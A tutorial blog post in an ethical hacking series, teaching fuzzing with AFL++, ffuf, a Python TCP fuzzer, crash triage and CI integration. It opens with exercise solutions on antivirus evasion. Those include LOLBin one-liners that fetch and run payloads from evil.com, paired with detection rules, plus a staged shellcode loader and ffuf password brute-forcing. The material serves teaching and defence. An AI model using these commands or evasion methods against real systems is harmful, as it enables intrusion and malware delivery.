Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed

avatar

Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed

leh-banner.jpg

What will I learn

  • What fuzzing is and why it finds bugs that manual testing and code review miss;
  • Types of fuzzing -- dumb fuzzing, smart/grammar-based fuzzing, and coverage-guided fuzzing;
  • AFL++ (American Fuzzy Lop) -- the industry-standard coverage-guided fuzzer;
  • libFuzzer -- in-process fuzzing integrated into the build system;
  • Web application fuzzing -- fuzzing HTTP parameters, headers, and API endpoints with ffuf;
  • Protocol fuzzing -- sending malformed data to network services;
  • Crash analysis and triage -- turning a crash into a vulnerability report;
  • Defense: fuzzing your own software before attackers do, integrating fuzzing into CI/CD.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • GCC or Clang installed (for compiling fuzz targets);
  • AFL++ installed (apt install afl++ on Debian/Ubuntu);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Advanced

Curriculum (of the Learn Ethical Hacking Series):

Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed

Solutions to Episode 63 Exercises

Exercise 1: Payload encoding evasion test.

Raw msfvenom payload (windows/x64/meterpreter/reverse_tcp):
  Windows Defender: DETECTED (Trojan:Win32/Meterpreter)
  VirusTotal: 52/72 detected

XOR-encoded + custom C loader (xor_encoder.py -> loader.c, compiled with MinGW):
  Windows Defender: NOT DETECTED on initial static scan
  VirusTotal: 8/72 detected (mostly heuristic-only vendors)
  BUT: Defender behavioral engine caught it at RUNTIME when
  shellcode allocated RWX memory and called CreateThread.
  Quarantine time: 4.2 seconds after first thread execution.

Conclusion: XOR encoding bypasses static signature detection
completely -- but behavioral detection catches the RWX allocation
pattern before the payload accomplishes anything. Encoding alone
is not sufficient against a modern EDR.

The key lesson from this experiment: the detection layer that matters is NOT the signature scanner (layer 1 from episode 63's architecture overview). It is the behavioral engine (layer 3). The XOR encoder changed every byte of the payload, so the hash and byte-pattern signatures no longer matched. But the fundamental BEHAVIOR -- allocate RWX memory, copy bytes into it, execute -- is a pattern that Defender's behavioral engine recognizes regardless of what the bytes themselves contain. This is why professional evasion (as covered in episode 63) combines encoding with anti-behavioral techniques like two-step allocation, indirect syscalls, and process injection into trusted processes.

Exercise 2: LOLBins analysis (five entries from the LOLBAS project).

1. certutil.exe
   Legitimate: certificate management utility
   Abuse: certutil -urlcache -split -f http://evil.com/payload.exe C:\tmp\p.exe
   Detection: process_creation where Image contains "certutil" AND
     CommandLine contains "urlcache" OR "decode" -- rare in normal ops

2. mshta.exe
   Legitimate: execute HTML Applications (.hta files)
   Abuse: mshta http://evil.com/payload.hta (downloads + executes HTA)
   Detection: mshta.exe with HTTP URL in CommandLine AND
     ParentImage not in expected Office apps (unusual parent)

3. MSBuild.exe
   Legitimate: build .NET projects from .csproj files
   Abuse: inline C# task execution with embedded shellcode loader
   Detection: MSBuild.exe where ParentImage NOT devenv.exe AND
     NOT msbuild pipeline process -- also: short-lived process,
     no actual .csproj file path in CommandLine

4. regsvr32.exe
   Legitimate: register COM DLL objects (regsvr32 /s mylib.dll)
   Abuse: regsvr32 /s /u /i:http://evil.com/payload.sct scrobj.dll
     loads and executes remote scriptlet -- AppLocker bypass
   Detection: regsvr32.exe where CommandLine contains "/i:http"
     -- the URL argument is essentially never legitimate

5. wmic.exe
   Legitimate: Windows Management Instrumentation query tool
   Abuse: wmic process call create "cmd.exe /c payload.exe"
     OR wmic os get /format:"http://evil.com/xsl.xsl"
   Detection: wmic.exe where CommandLine contains "process call
     create" -- or "os get /format" with a URL

The Sigma-style detection rules for LOLBins share a common pattern: they match the ABUSE syntax specifically, not the binary itself. certutil.exe launched normally for certificate inspection generates zero alerts. certutil.exe with -urlcache -split -f and a URL is something I have never seen in legitimate enterprise operations. The same goes for mshta.exe with an HTTP URL -- legitimate HTA files are local, not remote. The LOLBAS project (lolbas-project.github.io) documents exactly these abuse-vs-legitimate distinctions for 200+ Windows binaries, which is the reference for building detection rules that catch abuse without flooding your SIEM with false positives from legitimate use.

Exercise 3: Staged loader analysis.

Loader chain: xor_encoder.py -> encrypted payload hosted on
  python3 -m http.server 8888 -> staged_loader.py downloads + decrypts + executes

Network indicators an EDR would see:
  - Python process making HTTP request to 127.0.0.1:8888 (unusual)
  - Python process downloading binary data (Content-Type: application/octet-stream)
  - Python process importing ctypes (common, not suspicious alone)

Host-based indicators:
  - Python process calling mmap with PROT_EXEC (rare for Python apps)
  - Memory page with write+exec permissions in python3 address space
  - Unusual memory allocation pattern: mmap -> write -> ctypes cast -> call

Behavioral detections that would trigger:
  - ETW: executable memory page created in Python process
  - Sysmon Event 10 (ProcessAccess) if injecting vs just executing in-place
  - Defender memory scan: shellcode signature in python3 process heap

The staged design is clever in theory -- the encrypted payload never exists on disk, so static scanners see nothing suspicious (a Python script that imports ctypes and requests looks entirely benign). But the runtime execution creates exactly the behavioral signatures that ETW (Event Tracing for Windows, covered in episode 63's defense section) monitors at the kernel level. The mmap(PROT_EXEC) call from Python is particularly unusual -- legitimate Python programs essentially never need executable memory, so any EDR worth deploying will flag it as a high-confidence indicator of in-memory shellcode execution.


Episode 63 was about making payloads that evade antivirus. We covered static detection (signatures, hashes, YARA rules), heuristic detection (suspicious API imports, high entropy), behavioral detection (the sandbox watching what your code DOES, not what it looks like), AMSI for PowerShell, LOLBins for staying off-disk, and the EDR hook architecture that makes all of this work together. The theme across all of it: encoding and obfuscation only buy you time against static analysis. Behavioral detection catches you when you actually do something malicious, regardless of how well-disguised the payload looks.

Today we flip the script completely. Instead of delivering malicious inputs carefully, we deliver malicious inputs AUTOMATICALLY, at machine speed, in volume. We are going to throw millions of garbage inputs at software until it breaks. This is fuzzing, and it has found more vulnerabilities in critical software than any other automated technique in existence.

What Fuzzing Actually Is

Fuzzing is the art of throwing garbage at software until it breaks. Not random garbage -- intelligently mutated garbage that explores code paths the developer never anticipated.

The premise starts from an uncomfortable truth: developers test the happy path. They write unit tests for the expected inputs, integration tests for the expected workflows, and maybe a handful of edge cases they can think of off the top of their head. What they do NOT test is the unhappy universe -- the space of all possible malformed, truncated, oversized, corrupted, and structurally invalid inputs that a real-world attacker (or network blip, or buggy client) might send. That space is effectively infinite, and manual testing covers a vanishingly small fraction of it.

Fuzzers attack that untested space systematically. A fuzzer takes valid inputs (seeds), mutates them in every conceivable way (flip bits, add bytes, remove sections, swap fields, insert null bytes, generate boundary values), and feeds each mutation to the target. It does this millions of times per second. When the target crashes, hangs, or produces an error it shouldn't -- the fuzzer saves the input that caused it. You then analyze that input to find the underlying bug.

The numbers here are genuinely impressive. Google's OSS-Fuzz -- a continuous fuzzing service for critical open-source software -- has found over 10,000 bugs in 1,000+ projects since 2016, including Chrome, Firefox, OpenSSL, the Linux kernel, SQLite, curl, libpng, zlib, and hundreds more. These are mature, heavily-reviewed codebases with thousands of developer-hours of testing behind them. Fuzzing found bugs that human review missed entirely -- not because the reviewers were careless, but because the bug-triggering input was something no human tester would ever think to construct.

The reason fuzzing finds what code review misses is structural: code review checks for KNOWN bad patterns. Fuzzing discovers UNKNOWN bad behavior by exhaustive exploration. A reviewer looking at a memcpy call will check if the size parameter looks reasonable in the expected use case. A fuzzer will construct an input that makes the size parameter wrap around to a huge value when two integers are added together -- an integer overflow that triggers a heap buffer overflow that nobody was checking for.

Three Ways to Fuzz

1. Dumb (mutation-based) fuzzing
   Take valid input, randomly flip bits, add bytes, remove bytes.
   No knowledge of input format. Simple but surprisingly effective
   against parsers and decoders that process raw bytes.
   Example: take a valid PNG, randomly corrupt bytes, feed to
   image parser. PNG parsers have had many bugs found this way.

2. Smart (grammar-based) fuzzing
   Understand the input format. Generate inputs that are STRUCTURALLY
   valid but contain malformed VALUES within valid structures.
   Example: generate valid HTTP requests with overlong headers,
   illegal characters in the method field, or a negative
   Content-Length. The parser gets past the structure check
   and crashes deeper in the logic.

3. Coverage-guided fuzzing (the modern standard)
   Instrument the target binary to report which code paths execute.
   The fuzzer EVOLVES inputs that trigger new code paths.
   If mutation X causes the target to take a branch it has never
   taken before, keep that input and mutate it further.
   If mutation Y covers no new branches, discard it.
   This is evolutionary optimization applied to bug discovery.

Coverage-guided fuzzing is the reason fuzzing went from a useful-but-limited technique to the dominant vulnerability discovery method in modern security research. Dumb fuzzing is effective for simple formats -- it will find crashes in image parsers, audio decoders, and document format handlers relatively quickly. But for complex protocols (TLS, SMB, QUIC) or deeply nested code paths, random mutation will spend 99% of its time on inputs that fail early validation checks and never reach the interesting code. Coverage guidance solves this by treating the fuzzing process as a search problem: find the inputs that explore the most code, then build on those. Over hours and days, a coverage-guided fuzzer accumulates a corpus of inputs that collectively exercises an enormous fraction of the target's code -- far beyond what any manual test suite achieves.

AFL++: The Industry Standard

AFL++ (American Fuzzy Lop Plus Plus) is the current reference implementation of coverage-guided fuzzing for native code. It instruments target binaries at compile time to inject branch-coverage tracking code, then runs a feedback loop: mutate, execute, check if new branches were covered, keep or discard.

# Step 1: Compile target with AFL instrumentation
afl-gcc -o target_fuzz target.c
# or with Clang (better instrumentation quality):
afl-clang-fast -o target_fuzz target.c

# Step 2: Create seed corpus (start with valid examples)
mkdir input
echo "hello world" > input/seed1.txt
echo "<html><body>test</body></html>" > input/seed2.txt

# Step 3: Run the fuzzer
afl-fuzz -i input -o output -- ./target_fuzz @@
# @@ = AFL replaces this with the path to the mutated input file

# Step 4: Monitor progress (AFL shows a live dashboard)
# Total executions (millions per hour on fast targets)
# Unique crashes found
# Code coverage (paths discovered)
# Current mutation strategy (havoc, splice, deterministic)

# Step 5: Analyze crashes
ls output/crashes/
# Each file is the input that caused a crash
# Reproduce: ./target_fuzz < output/crashes/id:000000,...

The AFL status screen deserves special attention because it tells you whether your fuzzing campaign is actually making progress. Paths discovered is the key metric -- it shows how many distinct code paths the fuzzer has found inputs for. If this number is growing steadily, the fuzzer is finding new territory to explore and your corpus is accumulating useful seeds. If it plateaus early (say, at 50 paths for a complex parser that clearly has thousands of branches), your seed corpus is probably too narrow and the fuzzer cannot mutate its way past the early validation logic -- add more diverse seeds.

Stability (shown as a percentage) indicates how consistently the target produces the same coverage bitmap for the same input. 100% means deterministic: the same input always hits the same branches. Stability below 85% often indicates multithreading, ASLR effects on branch addresses, or time-dependent behavior -- situations where the coverage signal is noisy and AFL cannot reliably determine whether a mutation found something new. Fixing stability issues (disabling threading for fuzz targets, using ASAN's determinism flags) dramatically improves fuzzing efficiency.

Executions per second varies wildly by target complexity. Simple string parsers run at 200,000-500,000 executions/second. Complex document parsers run at 5,000-50,000. Network protocol code that needs socket setup per iteration might only manage 500. Faster is always better -- more executions per hour means more of the input space explored.

Writing an AFL Fuzz Harness

AFL needs a fuzz harness -- a wrapper program that reads input from a file and passes it to the function you want to test. The quality of the harness determines the quality of the fuzzing campaign. A badly written harness that returns early on most mutations without actually exercising the target code is useless regardless of how many hours you run it.

// fuzz_harness.c -- wrap a library function for AFL fuzzing
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// The function we want to fuzz (from a library)
extern int parse_config(const char *data, size_t len);

int main(int argc, char **argv) {
    // Read input from file (AFL provides via @@)
    FILE *f = fopen(argv[1], "rb");
    if (!f) return 1;

    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    if (size > 1024 * 1024) { fclose(f); return 1; } // limit input size
    fseek(f, 0, SEEK_SET);

    char *buf = malloc(size);
    fread(buf, 1, size, f);
    fclose(f);

    // Call the function under test
    parse_config(buf, size);

    free(buf);
    return 0;
}
# Compile with sanitizers for much better crash detection
afl-clang-fast -fsanitize=address,undefined -o fuzz_harness fuzz_harness.c -ltarget
# AddressSanitizer catches: buffer overflows, use-after-free, double-free,
#   heap/stack/global buffer overflows with precise location
# UndefinedBehaviorSanitizer catches: integer overflow, null dereference,
#   misaligned memory access, invalid casts

afl-fuzz -i seeds -o findings -m none -- ./fuzz_harness @@
# -m none: disable memory limit (needed with ASAN overhead)

AddressSanitizer is what transforms "the program crashed" into "the program crashed with a heap buffer overflow at offset 8 beyond a 24-byte allocation in parse_config() at line 142". Without sanitizers, a buffer overflow might not crash at all -- the program just writes past the end of its buffer into adjacent memory and keeps running, producing silent corruption. With ASAN, every out-of-bounds access triggers an immediate crash with a detailed report pinpointing the exact allocation, the access offset, and the full call stack. This makes triage dramatically faster -- you go from "something crashed" to "exploitable heap overflow in config parser" in minutes rather than hours of manual analysis.

Web Application Fuzzing with ffuf

ffuf (Fuzz Faster U Fool) is the web equivalent of AFL -- it sends millions of mutated HTTP requests to a web application and identifies responses that are different from the baseline. Unlike AFL, ffuf is black-box (no source code needed, no instrumentation), and it is built specifically for the HTTP use cases a pentester faces daily.

# Directory fuzzing (find hidden paths)
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt

# Parameter fuzzing (discover hidden GET parameters)
ffuf -u "http://target.com/page?FUZZ=test" -w /usr/share/wordlists/params.txt \
    -fs 4242  # filter responses with this size (baseline size for unknown params)

# POST parameter fuzzing
ffuf -u http://target.com/login -X POST \
    -d "username=admin&password=FUZZ" \
    -w /usr/share/wordlists/rockyou.txt \
    -fc 401  # filter 401 responses (wrong password)

# Header fuzzing (find headers the app responds to differently)
ffuf -u http://target.com/ -H "X-Custom-Header: FUZZ" \
    -w payloads.txt -fs 0 -mc all  # show all response sizes

# Virtual host discovery (find hosts on shared infrastructure)
ffuf -u http://target.com/ -H "Host: FUZZ.target.com" \
    -w subdomains.txt -fs 0

# Multi-position fuzzing (username + password simultaneously)
ffuf -u http://target.com/login -X POST \
    -d "username=FUSER&password=FPASS" \
    -w users.txt:FUSER -w passwords.txt:FPASS \
    -fc 401 -mode clusterbomb

The response filtering options are what separate useful ffuf output from noise. Without filtering, every request returns a response and you have to manually inspect thousands of results. The -fc (filter HTTP status code), -fs (filter response size), -fl (filter line count), and -fw (filter word count) flags let you define what "normal" looks like and only show you the anomalies. A parameter that returns a response 200 bytes larger than the baseline is interesting -- it might be an undocumented parameter that does something. A path that returns 200 instead of 404 is interesting -- it exists. A header that changes the response significantly is interesting -- the application is using it for something.

Wordlist selection matters enormously. /usr/share/wordlists/dirb/common.txt has ~4,600 entries -- good for a quick check, misses a lot. SecLists (github.com/danielmiessler/SecLists) is the community-maintained reference: hundreds of wordlists covering directory names, parameter names, API paths, subdomains, common credentials, and more. The Discovery/Web-Content/raft-large-words.txt wordlist has 119,600 entries and finds things that the common wordlist misses entirely.

Protocol Fuzzing

Web fuzzing is high-level -- HTTP is a text protocol and ffuf handles the structure automatically. Protocol fuzzing means sending malformed data directly to network services at the binary level, which requires you to implement the mutation logic yourself.

#!/usr/bin/env python3
"""proto_fuzz.py -- basic protocol fuzzer for TCP services"""
import socket
import random
import sys

def generate_mutations(seed_input):
    """Generate mutated versions of valid input."""
    mutations = []

    # Bit flipping
    for i in range(len(seed_input)):
        mutated = bytearray(seed_input)
        mutated[i] ^= random.randint(1, 255)
        mutations.append(bytes(mutated))

    # Buffer overflow attempts
    for length in [256, 1024, 4096, 65535]:
        mutations.append(b'A' * length)
        mutations.append(seed_input + b'A' * length)

    # Format string attempts
    for fmt in [b'%s%s%s%s', b'%x%x%x%x', b'%n%n%n%n']:
        mutations.append(fmt * 20)

    # Null bytes, boundary values, special characters
    mutations.append(b'\x00' * 100)
    mutations.append(b'\xff' * 100)
    mutations.append(seed_input.replace(b'\n', b'\r\n\r\n'))

    # Integer boundary values (classic overflow triggers)
    for val in [b'0', b'-1', b'2147483647', b'4294967295', b'-2147483648']:
        mutations.append(val)

    return mutations

def fuzz_service(host, port, seed_input, iterations=1000):
    """Send mutated inputs to a TCP service."""
    crashes = []
    mutations = generate_mutations(seed_input)

    for i in range(iterations):
        mutation = random.choice(mutations)
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(3)
            s.connect((host, port))
            s.send(mutation)
            try:
                response = s.recv(4096)
            except socket.timeout:
                pass
            s.close()
        except ConnectionRefusedError:
            print(f"[!] Service crashed after mutation {i}!")
            crashes.append(mutation)
            break
        except Exception:
            pass

    return crashes

if __name__ == '__main__':
    host = sys.argv[1]
    port = int(sys.argv[2])
    seed = sys.argv[3].encode() if len(sys.argv) > 3 else b'GET / HTTP/1.0\r\n\r\n'
    crashes = fuzz_service(host, port, seed)
    print(f"\n{len(crashes)} crashes found")
    for c in crashes:
        print(f"  Crash input ({len(c)} bytes): {c[:100]}")

The integer boundary values deserve specific emphasis. Many crashes in network services come from integer overflows -- the server reads a length field from the packet, performs arithmetic on it (maybe multiplying by an element size, or adding to a base offset), and the result wraps around to a small or negative value. The attacker sends length=4294967295, the server computes 4294967295 * sizeof(element) and gets something close to zero due to 32-bit overflow, allocates a tiny buffer, then copies the full 4GB of "data" into it. Classic heap overflow. Testing with boundary values (INT_MAX, UINT_MAX, 0, -1) catches a surprising number of these without needing deep coverage guidance.

Crash Triage

When AFL (or your protocol fuzzer) finds a crash, you have a starting point -- not a finished finding. Crash triage is the process of turning "the program crashed with this input" into a vulnerability assessment.

# When AFL finds crashes in output/crashes/:

# 1. Reproduce the crash
./target_fuzz < output/crashes/id:000000,sig:11,src:000001,op:havoc,rep:2
# sig:11 = SIGSEGV (segmentation fault)
# sig:6  = SIGABRT (assertion failure, often ASAN or abort())
# sig:8  = SIGFPE  (floating point exception, often integer divide by zero)

# 2. Get crash details with GDB (for binaries WITHOUT ASAN)
gdb -batch -ex run -ex bt -ex quit --args ./target_fuzz output/crashes/id:000000,...
# Backtrace shows WHERE the crash occurred

# 3. Detailed ASAN report (compile with -fsanitize=address first)
./target_fuzz_asan < output/crashes/id:000000,...
# ASAN output example:
# ==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
# READ of size 4 at 0x... thread T0
# #0 in parse_config() config_parser.c:142
# #1 in main() harness.c:28
# Shadow bytes around the buggy address: (shows heap layout)

# 4. Assess exploitability
# Stack buffer overflow:    high -- typically RCE via return address overwrite
# Heap buffer overflow:     medium-high -- exploitabiltiy depends on heap layout
# Use-after-free:           high -- often leads to type confusion, code exec
# Null pointer dereference: low -- typically DoS only, not exploitable
# Integer overflow:         depends -- if it leads to buffer overflow, high

# 5. Minimize the crash input (smaller = easier to analyze)
afl-tmin -i output/crashes/id:000000,... -o minimized.txt -- ./target_fuzz @@
# Removes bytes that are not necessary to trigger the crash
# A 4096-byte crash input often minimizes to 12 bytes

The crash signal is your first triage signal. SIGSEGV means the program tried to access memory it should not -- either a null pointer dereference (address near 0x0) or an out-of-bounds access to a valid-ish address. SIGABRT usually means an assertion failure or a abort() call triggered by ASAN or a CHECK() macro inside the target -- look at the abort message. SIGFPE almost always means a divide-by-zero or integer overflow feeding into arithmetic.

The ASAN output is far more useful than a raw GDB backtrace. Where GDB tells you "it crashed at address 0x7fff..." (and you have to figure out why), ASAN tells you "heap-buffer-overflow: READ of size 4, 8 bytes beyond a 24-byte allocation". That narrows the bug immediately: there is a 24-byte allocation somewhere (you can find the allocation site in the ASAN output), and code is reading 4 bytes starting at offset 32 -- 8 bytes past the end. Find the allocation, find the code that reads past it, and you have the vulnerability.

Input minimization with afl-tmin is underrated. AFL's crash inputs are often large (the mutations that found the crash may have required specific bytes scattered across a kilobyte of data). afl-tmin removes bytes one by one, testing after each removal to see if the crash still occurs. The result is the minimum input needed to trigger the bug -- which makes manual analysis much easier. Fewer bytes = cleaner understanding of what the parser is mishandling.

Defense: Fuzz Before Attackers Do

The offensive perspective on fuzzing is finding bugs in OTHER people's software. The defensive perspective is finding bugs in YOUR software before the attacker does. The same tools, completely different target.

# Integrate fuzzing into CI/CD:

# 1. OSS-Fuzz (for open-source projects -- free)
# Google runs fuzzers continuously on your project at Google scale
# Requirements: write a fuzz target, add build scripts, submit to OSS-Fuzz
# Results: bugs reported privately with 90-day disclosure deadline
# https://github.com/google/oss-fuzz

# 2. ClusterFuzzLite (GitHub Actions integration)
# Same engines as OSS-Fuzz but runs in your own CI pipeline
# No Google account needed, runs on your infrastructure
# https://google.github.io/clusterfuzzlite/

# Example GitHub Actions workflow for continuous fuzzing:
# name: Fuzz
# on: [push, pull_request, schedule]
# jobs:
#   fuzz:
#     runs-on: ubuntu-latest
#     steps:
#       - uses: actions/checkout@v3
#       - name: Build fuzz targets
#         run: afl-clang-fast -fsanitize=address -o fuzz_target fuzz_harness.c
#       - name: Run fuzzer (1 hour per PR)
#         run: |
#           afl-fuzz -i corpus -o findings -V 3600 -- ./fuzz_target @@
#       - name: Check for crashes
#         run: |
#           if [ -d findings/crashes ] && [ "$(ls findings/crashes | wc -l)" -gt 0 ]; then
#             echo "Fuzzing found crashes!"
#             ls -la findings/crashes/
#             exit 1
#           fi
#       - name: Save corpus
#         uses: actions/cache@v3
#         with:
#           path: corpus
#           key: fuzz-corpus-${{ github.sha }}
#           restore-keys: fuzz-corpus-

# 3. Picking good fuzz targets
# Best candidates: parsing code, protocol handlers, format decoders
#   -- any code that processes external input and does complex logic
# Poor candidates: UI code, config file loading (usually simple),
#   pure computation without branching on input values

The corpus caching in the CI example is more important than it looks. On the first run, the fuzzer starts from scratch and spends time rediscovering the basic code paths. On subsequent runs (stored in the cache), it starts from a corpus that already covers those paths and immediately explores deeper territory. Over weeks of CI runs, the corpus accumulates enough coverage that new mutations have to work harder to find unexplored code -- which is exactly where the interesting bugs live. Without corpus caching, every CI run starts over from zero and the fuzzing is far less effective per CPU-hour.

For target selection: not all code is equally worth fuzzing. The highest-value targets are parsers and decoders -- anything that reads external data and makes decisions based on its structure. An image parser (PNG, JPEG, WebP), a document format handler (PDF, DOCX, RTF), a network protocol implementation (TLS handshake parsing, DNS response parsing, HTTP/2 frame parsing) -- these are the functions where real-world vulnerabilities cluster, and where fuzzing has the highest yield. Code that does pure computation on validated inputs (sorting, math, string formatting with known-good data) is much less likely to have memory safety issues.

The AI Slop Connection

AI is changing fuzzing in both directions. AI-powered fuzzers use language models to generate structurally valid inputs that explore deeper code paths than random mutation -- essentially grammar-based fuzzing where the "grammar" is learned from real examples rather than hand-written. Google's research on ML-guided fuzzing has shown improvements in path coverage for complex protocols where random mutation gets stuck at early validation checks.

But AI also generates code that is particularly vulnerable to fuzzing. AI-generated parsers often lack bounds checking because the training data is full of insecure C patterns that "work" on expected inputs. AI-generated string handling uses strcpy and sprintf without length checks. AI-generated network code does not validate that a length field makes sense before using it as a malloc argument. Running a fuzzer against AI-generated code is almost guaranteed to find bugs -- usually within minutes, not hours. The code passes happy-path tests because the AI optimized for the common case. It fails catastrophically on unusual inputs because the AI never learned to consider the hostile case.

The lesson for developers: if you are shipping code -- AI-generated or otherwise -- that processes external input, fuzz it. There is no excuse for buffer overflows in new code when AFL++ finds them in 30 minutes on your laptop. The bugs that fuzzing catches are the bugs that attackers will find if you ship without testing ;-)

Exercises

Exercise 1: Install AFL++ and fuzz a simple C program. Write a function that parses a custom configuration file format (key=value lines, # for comments, [sections] for grouping). The parser should handle all three constructs and store results in a struct. Compile with afl-clang-fast and AddressSanitizer. Create 3 seed inputs (one for each feature: a comment-only file, a key=value file, a sectioned config). Fuzz for 30 minutes. Document: (a) total executions, (b) unique paths discovered, (c) any crashes found, (d) the ASAN report for the first crash if applicable. Save to ~/lab-notes/afl-exercise.md.

Exercise 2: Use ffuf to fuzz a web application in your lab (DVWA, Juice Shop, or any test app). Perform: (a) directory brute forcing against the root with raft-large-words.txt from SecLists, (b) GET parameter discovery on a known page that takes parameters (hint: try the login or search pages), (c) virtual host enumeration with a subdomains wordlist. For each run, document the filter flags you used and why. Compare ffuf's speed in executions/second against running the same wordlist with gobuster. Save to ~/lab-notes/ffuf-exercise.md.

Exercise 3: Research Google OSS-Fuzz statistics and one specific CVE found by fuzzing. Find: (a) the current total bug count and number of projects covered, (b) the top 5 projects by bugs found (check the OSS-Fuzz GitHub repo for the table), (c) the most common CWE categories in OSS-Fuzz findings (heap-buffer-overflow vs use-after-free vs others), (d) average time from bug report to fix across the project. Then pick ONE critical CVE that was discovered by automated fuzzing (Heartbleed, ImageMagick CVE-2016-3714, or any other well-documented fuzz-discovered CVE) and document: the fuzzing campaign that found it, the input that triggered it, and what code change fixed it. Save to ~/lab-notes/ossfuzz-research.md.


Thanks for reading!

@scipio



0
0
0.000
1 comments
avatar

Congratulations @scipio! You have completed the following achievement on the Hive blockchain And have been rewarded with New badge(s)

You have been a buzzy bee and published a post every day of the week.

You can view your badges on your board and compare yourself to others in the Ranking
If you no longer want to receive notifications, reply to this comment with the word STOP

0
0
0.000